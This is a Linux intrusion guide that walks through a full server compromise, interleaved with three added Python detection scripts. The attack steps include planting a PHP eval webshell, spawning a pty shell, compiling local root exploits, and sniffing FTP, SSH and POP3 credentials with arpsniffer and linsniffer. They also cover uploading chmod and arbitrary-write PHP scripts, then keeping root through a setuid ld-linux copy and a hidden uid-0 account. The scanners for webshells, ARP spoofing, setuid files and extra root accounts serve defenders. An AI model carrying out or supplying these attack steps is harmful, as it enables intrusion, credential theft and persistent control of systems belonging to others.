Deploy a One‑Line PHP Backdoor and Escalate Linux Privileges
This guide walks through creating a simple PHP backdoor, using Python pty for interactive shells, compiling and exploiting local binaries, sniffing network traffic with arpsniffer and linsniffer, and applying various Linux privilege‑escalation techniques to obtain root access.
1. Create a one‑line PHP backdoor
Upload a PHP file containing the following code to the target server:

    <?php @eval($_POST[md5])?>

Save it as rankuplog_time.php and verify its content with cat rankuplog_time.php.
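From the defender's side, the one-liner above and the chmod/fopen helper scripts shown later on this page share one shape: a request superglobal flows, directly or through stripslashes(), into eval(), chmod() or fopen(). The scanner below is an added example (not code from the original article) that walks a web root for that shape; the sample PHP strings are constructed copies of the page's snippets plus one harmless script, and the sink list and file extensions are assumptions.

```python
"""Flag PHP files where request input reaches eval/chmod/fopen-style sinks.

Added detection example; the sink list, extensions and samples are assumptions.
"""
import os
import re
from typing import Dict, List, Tuple

# Request superglobals that a web client controls directly.
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE"}

# "$var = $_POST[...]" or "$var = anyfunc($_POST[...])": $var now carries
# request input. stripslashes(), used by the page's scripts, does not sanitise.
ASSIGN_RE = re.compile(
    r"@?\s*\$(\w+)\s*=\s*@?(?:\w+\s*\(\s*)?\$(_GET|_POST|_REQUEST|_COOKIE)\s*\[")

# Sinks whose first argument is a variable (or a superglobal, which also
# matches \$(\w+) because \w covers the underscore).
SINK_RE = re.compile(
    r"\b(eval|assert|chmod|fopen|file_put_contents|system|exec|shell_exec|passthru)"
    r"\s*\(\s*\$(\w+)")

Finding = Tuple[int, str, str]  # (line number, sink name, variable)


def scan_source(src: str) -> List[Finding]:
    """Return (line, sink, variable) for every sink fed by request input."""
    tainted = {m.group(1) for m in ASSIGN_RE.finditer(src)}
    findings: List[Finding] = []
    for m in SINK_RE.finditer(src):
        sink, var = m.group(1), m.group(2)
        if var in SUPERGLOBALS or var in tainted:
            line = src.count("\n", 0, m.start()) + 1
            findings.append((line, sink, "$" + var))
    return findings


def scan_dir(root: str, exts=(".php", ".phtml", ".php5")) -> Dict[str, List[Finding]]:
    """Scan every PHP-like file under root; map path -> findings (non-empty only)."""
    report: Dict[str, List[Finding]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report


# Constructed samples: the page's one-liner, its two helper scripts, and a
# script that reads request input but never passes it to a sink.
SAMPLE_BACKDOOR = "<?php @eval($_POST[md5])?>"
SAMPLE_CHMOD = ("<?php\n$path = stripslashes($_GET['path']);\n"
                "$ok = chmod($path, 0777);\nif($ok) echo 'CHMOD OK';\n?>")
SAMPLE_WRITER = ("<?php\n@$filename = stripslashes($_POST['filename']);\n"
                 "@$mess = stripslashes($_POST['mess']);\n"
                 "$fp = @fopen($filename, 'a');\n@fputs($fp, $mess);\n@fclose($fp);\n?>")
SAMPLE_BENIGN = ("<?php\n$name = htmlspecialchars($_GET['name']);\n"
                 "echo \"Hello $name\";\n?>")

if __name__ == "__main__":
    import sys
    for label, src in [("backdoor", SAMPLE_BACKDOOR), ("chmod", SAMPLE_CHMOD),
                       ("writer", SAMPLE_WRITER), ("benign", SAMPLE_BENIGN)]:
        print(f"{label:9} {scan_source(src)}")
    if len(sys.argv) > 1:  # python scanner.py /var/www
        for path, hits in scan_dir(sys.argv[1]).items():
            print(path, hits)
```

The taint tracking is deliberately one hop deep (assignment from a superglobal, then use in a sink), which is exactly the shape of the scripts on this page; a real deployment would pair it with file-integrity monitoring of the web root so that a newly uploaded .php file is reviewed regardless of its contents.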
2. Initial foothold and privilege escalation
After gaining a limited shell, list the web directory:

    ls -la /www.users/

Use Python's pty module to obtain an interactive shell:

    python -c 'import pty; pty.spawn("/bin/sh")'

Check the current user ID and kernel version:

    id
    uname -r

Typical Linux privilege-escalation vectors include third-party software vulnerabilities, local trust features, and kernel overflows. Exploit databases such as http://tools.90sec.org/, http://sebug.net/paper/linux_exp/, and http://www.exploit-db.com/search/ can be consulted.
3. Compile and run local exploits
Upload source files (e.g., 2.c) to /tmp, compile them, and execute:

    gcc -o 2 2.c
    chmod +x 2
    ./2

For the arpsniffer tool, install the required libraries and compile:

    rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
    wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
    tar zxvf libpcap-0.8.1.tar.gz
    cd libpcap-0.8.1
    ./configure
    make
    make install
    gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run the sniffer against the target network:

    ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Capture traffic with tcpdump and save it to a file for later analysis:

    tcpdump -i eth0 host 192.168.0.11 -w pop.txt

4. Modify and use linsniffer to capture credentials
Edit linsniffer.c to monitor the desired ports (e.g., FTP, SSH, POP3):

    if(ntohs(tcp->dest)==21) p=1; /* ftp */
    if(ntohs(tcp->dest)==22) p=1; /* ssh */
    if(ntohs(tcp->dest)==110) p=1; /* pop3 */
    /* add other ports as needed */

Compile and run:

    gcc -o linsniffer linsniffer.c
    ./linsniffer

The captured usernames and passwords are stored in tcp.log.
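Both sniffers in sections 3 and 4 leave traces a host or network administrator can look for: an ARP-based interceptor makes one hardware address answer for more than one IP (typically the gateway and a victim) in neighbouring hosts' ARP caches, and a packet sniffer normally puts its interface into promiscuous mode, which Linux exposes as bit 0x100 (IFF_PROMISC from linux/if.h) in /sys/class/net/<iface>/flags. The checks below are an added example, not code from the original article; the /proc/net/arp sample is constructed (it reuses the page's 192.168.0.x addresses), and the baseline gateway MAC is an assumption.

```python
"""ARP-cache consistency and promiscuous-interface checks for a Linux host.

Added detection example; the sample table and baseline MAC are constructed.
"""
import os
from typing import Dict, List

IFF_PROMISC = 0x100  # interface flag from linux/if.h
ATF_COM = 0x02       # /proc/net/arp flag: entry is complete (has a MAC)


def parse_arp_table(text: str) -> List[dict]:
    """Parse the text of /proc/net/arp into a list of entry dicts."""
    entries = []
    for line in text.splitlines()[1:]:  # first line is the column header
        parts = line.split()
        if len(parts) < 6:
            continue
        ip, _hwtype, flags, mac, _mask, dev = parts[:6]
        entries.append({"ip": ip, "flags": int(flags, 16),
                        "mac": mac.lower(), "dev": dev})
    return entries


def find_duplicate_macs(entries: List[dict]) -> Dict[str, List[str]]:
    """Return MACs that answer for more than one IP (classic ARP-spoof symptom)."""
    by_mac: Dict[str, List[str]] = {}
    for e in entries:
        if not e["flags"] & ATF_COM or e["mac"] == "00:00:00:00:00:00":
            continue  # incomplete entries carry no usable address
        by_mac.setdefault(e["mac"], []).append(e["ip"])
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_mac_changed(entries: List[dict], gateway_ip: str, expected_mac: str) -> bool:
    """True if the cached MAC for the gateway differs from the recorded baseline."""
    for e in entries:
        if e["ip"] == gateway_ip and e["flags"] & ATF_COM:
            return e["mac"] != expected_mac.lower()
    return False  # gateway not cached; nothing to compare against


def is_promiscuous(flags_hex: str) -> bool:
    """Interpret the hex value read from /sys/class/net/<iface>/flags."""
    return bool(int(flags_hex, 16) & IFF_PROMISC)


def promiscuous_interfaces(sysfs: str = "/sys/class/net") -> List[str]:
    """List interfaces currently in promiscuous mode on this host."""
    found = []
    try:
        names = os.listdir(sysfs)
    except OSError:
        return found
    for name in names:
        try:
            with open(os.path.join(sysfs, name, "flags")) as fh:
                if is_promiscuous(fh.read().strip()):
                    found.append(name)
        except OSError:
            continue
    return found


# Constructed /proc/net/arp snapshot: one MAC claims both the gateway and .77.
SAMPLE_ARP = """IP address       HW type     Flags       HW address            Mask     Device
192.168.0.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.0.77     0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.0.11     0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
192.168.0.99     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
BASELINE_GATEWAY_MAC = "de:ad:be:ef:00:01"  # assumed value recorded on a clean day

if __name__ == "__main__":
    entries = parse_arp_table(SAMPLE_ARP)
    print("shared MACs:", find_duplicate_macs(entries))
    print("gateway changed:", gateway_mac_changed(entries, "192.168.0.1", BASELINE_GATEWAY_MAC))
    print("promiscuous interfaces:", promiscuous_interfaces())
```

On a live host, replace SAMPLE_ARP with the contents of /proc/net/arp and keep the gateway's MAC as a static ARP entry or a recorded baseline; a shared MAC between the gateway and an ordinary client is the signal worth paging on. The promiscuous-mode check is only a heuristic, since legitimate monitoring tools set the same flag.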
5. Additional PHP-based privilege‑escalation scripts
Upload a script to change file permissions:

    <?php
    $path = stripslashes($_GET['path']);
    $ok = chmod($path, 0777);
    if($ok) echo "CHMOD OK, permission editable file or directory.";
    ?>

Upload a script to write arbitrary data to a file:

    <?php
    @$filename = stripslashes($_POST['filename']);
    @$mess = stripslashes($_POST['mess']);
    $fp = @fopen($filename, 'a');
    @fputs($fp, $mess);
    @fclose($fp);
    ?>

6. Final root persistence

After obtaining root, create a set-uid backdoor:

    cp /lib/ld-linux.so.2 /tmp/.str1ven
    chmod +s /tmp/.str1ven

Execute it to retain root privileges, then add a new root user if desired:

    useradd -u 0 -o username

Various system commands (e.g., cat /etc/passwd, ifconfig, service --status-all) can be used to enumerate the environment and verify the compromise.
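The two persistence steps above leave durable, easily audited artefacts: a setuid binary in a world-writable directory and a second account with uid 0 in /etc/passwd (which is what useradd -u 0 -o produces). The audit below is an added example, not code from the original article; the set of directories where setuid binaries are considered normal and the sample passwd lines are assumptions.

```python
"""Audit for setuid binaries outside system paths and for extra uid-0 accounts.

Added detection example; EXPECTED_SUID_DIRS and SAMPLE_PASSWD are assumptions.
"""
import os
import stat
from typing import List, Tuple

# Directories where setuid/setgid binaries are expected on a typical distribution
# (assumed baseline); anything elsewhere is reported for review.
EXPECTED_SUID_DIRS = ("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/lib", "/usr/libexec")

# Places a dropped binary usually lands; scanned by default.
DEFAULT_SCAN_ROOTS = ("/tmp", "/var/tmp", "/dev/shm", "/home", "/var/www")


def parse_passwd(text: str) -> List[Tuple[str, int, str]]:
    """Return (name, uid, shell) for each well-formed /etc/passwd line."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7 or not fields[2].isdigit():
            continue
        users.append((fields[0], int(fields[2]), fields[6]))
    return users


def extra_uid0_accounts(text: str) -> List[str]:
    """Account names other than 'root' that resolve to uid 0."""
    return [name for name, uid, _ in parse_passwd(text) if uid == 0 and name != "root"]


def is_suspicious_suid(path: str, mode: int) -> bool:
    """True for a regular file with setuid/setgid set outside the expected dirs."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return False
    return not any(path.startswith(d + "/") for d in EXPECTED_SUID_DIRS)


def find_suspicious_suid(roots=DEFAULT_SCAN_ROOTS) -> List[str]:
    """Walk the given roots (without following symlinks) and collect hits."""
    hits = []
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks
                except OSError:
                    continue
                if is_suspicious_suid(path, st.st_mode):
                    hits.append(path)
    return hits


# Constructed sample data: a clean root entry, a web user, and a planted uid-0 user.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
# comment lines and malformed lines are ignored
broken line without fields
username:x:0:0::/home/username:/bin/sh
"""
SAMPLE_SUID_MODE = stat.S_IFREG | stat.S_ISUID | 0o755   # -rwsr-xr-x regular file
SAMPLE_PLAIN_MODE = stat.S_IFREG | 0o755                 # -rwxr-xr-x regular file

if __name__ == "__main__":
    print("extra uid-0 accounts (sample):", extra_uid0_accounts(SAMPLE_PASSWD))
    try:
        with open("/etc/passwd") as fh:
            print("extra uid-0 accounts (this host):", extra_uid0_accounts(fh.read()))
    except OSError:
        pass
    print("suspicious setuid files:", find_suspicious_suid())
```

Run it from cron or a configuration-management check; the uid-0 test in particular is cheap and has essentially no false positives on a standard system. Comparing the setuid list against a package manager's expected file list (for example rpm -V on the RPM-based host this page targets) closes the gap for binaries planted inside the expected directories.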
MaGe Linux Operations